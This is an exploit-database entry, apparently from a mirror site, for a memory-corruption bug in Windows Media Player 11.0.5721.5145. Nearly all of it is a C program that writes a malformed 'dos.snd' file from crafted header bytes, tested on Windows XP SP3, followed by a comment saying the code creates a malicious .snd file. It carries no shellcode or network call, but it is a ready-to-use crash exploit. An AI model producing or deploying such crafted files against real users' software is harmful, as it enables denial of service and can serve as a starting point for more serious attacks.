Microsoft Windows Media Player v. 11.0.5721.5145 .snd Memory Corruption



EKU-ID: 1818 CVE: OSVDB-ID:
Author: Dan Fosco Published: 2012-03-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


// Title: Microsoft Windows Media Player v. 11.0.5721.5145 .snd Memory Corruption
// Date: 3/24/2012
// Author: Dan Fosco
// Vendor or Software Link: www.microsoft.com
// Version: 11.0.5721.5145
// Category: local
// Tested on: Windows XP SP3 (EN)

#include <stdio.h>

int main(int argc, char *argv)
{
FILE *f;
f = fopen("dos.snd", "w");

fputs("\x2e\x73\x6e\x64", f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x1c', f);
fputc('\x00', f);
fputs("\x07\x48\x9e", f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x01', f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x1f', f);
fputc('\x4c', f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);

fclose(f);
return 0;
}

//use code for creating malicious file .snd file